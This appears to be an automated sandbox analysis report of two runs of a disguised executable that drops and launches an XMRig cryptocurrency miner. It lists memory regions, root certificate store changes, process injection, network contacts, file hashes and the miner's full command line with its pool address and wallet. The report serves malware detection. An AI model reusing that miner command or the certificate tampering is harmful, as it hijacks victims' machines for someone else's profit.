memory/2084-55-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-56-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-57-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-58-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-59-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-60-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-61-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-62-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-63-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-64-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-65-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-66-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-67-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-68-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-69-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-70-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-71-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-72-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-73-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-74-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-75-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-76-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-77-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-78-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-79-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-80-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-81-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-82-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-83-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
memory/2084-84-0x00007FF6DE860000-0x00007FF6DF363000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3712 wrote to memory of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3712 wrote to memory of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.253.116.51.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4948-16-0x000001A76CB50000-0x000001A76CB70000-memory.dmp
memory/4948-17-0x000001A76CBA0000-0x000001A76CBC0000-memory.dmp
memory/4948-18-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-20-0x000001A76CBE0000-0x000001A76CC00000-memory.dmp
memory/4948-19-0x000001A76CBC0000-0x000001A76CBE0000-memory.dmp
memory/4948-21-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-22-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-25-0x000001A76CBE0000-0x000001A76CC00000-memory.dmp
memory/4948-24-0x000001A76CBC0000-0x000001A76CBE0000-memory.dmp
memory/4948-23-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-26-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-27-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-28-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-29-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-30-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-31-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-32-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-33-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-34-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-35-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-36-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-37-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-38-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-39-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-40-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-41-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-42-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-43-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-44-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-45-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-46-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-47-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-48-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-49-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-50-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-51-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-52-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-53-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-54-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-55-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-56-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-57-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-58-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-59-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-60-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-61-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-62-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-63-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-64-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-65-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-66-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-67-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-68-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-69-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-70-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-71-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-72-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-73-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-74-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-75-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-76-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-77-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-78-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-79-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-80-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-81-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-82-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-83-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
memory/4948-84-0x00007FF7BCC00000-0x00007FF7BD703000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 780 wrote to memory of 4928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 780 wrote to memory of 4928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4928-16-0x000001CF71F00000-0x000001CF71F20000-memory.dmp
memory/4928-17-0x000001CF738F0000-0x000001CF73910000-memory.dmp
memory/4928-18-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-20-0x000001CF73930000-0x000001CF73950000-memory.dmp
memory/4928-19-0x000001CF73910000-0x000001CF73930000-memory.dmp
memory/4928-21-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-22-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-25-0x000001CF73930000-0x000001CF73950000-memory.dmp
memory/4928-24-0x000001CF73910000-0x000001CF73930000-memory.dmp
memory/4928-23-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-26-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-27-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-28-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-29-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-30-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-31-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-32-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-33-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-34-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-35-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-36-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-37-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-38-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
